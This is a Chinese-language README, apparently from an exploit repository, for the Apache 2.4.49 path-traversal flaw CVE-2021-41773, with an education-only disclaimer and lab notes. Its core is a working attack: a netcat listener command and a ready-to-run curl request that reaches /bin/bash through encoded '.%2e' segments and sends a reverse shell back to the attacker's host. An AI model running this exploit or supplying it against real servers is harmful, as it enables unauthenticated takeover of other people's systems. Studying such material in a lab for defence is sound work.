⚠️ 免责声明
本仓库仅供教育和研究目的。
这里提供的信息和代码只能在受控环境(例如私人实验室机器)中使用。
未经授权将本代码用于您不拥有或未获得明确许可测试的系统是非法的且不道德的。
作者不对任何滥用或造成的损害负责。
CVE-2021-41773 影响 Apache HTTP Server 版本 2.4.49。
由于路径规范化中的输入验证不当,攻击者可以利用编码字符(如 %2e)进行路径遍历以访问任意文件。
如果启用了CGI,此漏洞可以升级为未认证的远程代码执行(RCE)。
构造一个恶意的 curl 请求以利用路径遍历缺陷。当启用CGI时,攻击者可以访问 /bin/bash 并运行任意 shell 命令。
在此示例中,发送反弹 Shell 有效载荷以从服务器获取 Shell 访问。
此漏洞已在私有实验室环境中测试。以下是步骤和结果。
Nmap 扫描发现目标运行 Apache/2.4.49。

使用精心构造的 curl 命令发送反弹 Shell 有效载荷。

在攻击者的监听器上成功获取了反弹 Shell。

步骤 1:启动 Netcat 监听器
nc -nvlp 4444
步骤 2:运行漏洞利用
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'
Apache 版本为 2.4.49
已启用 CGI
防火墙已开放 4444 端口(或你选择的端口)
查看我在 Medium 上的详细演练和理论:
👉 在 Medium 上阅读博客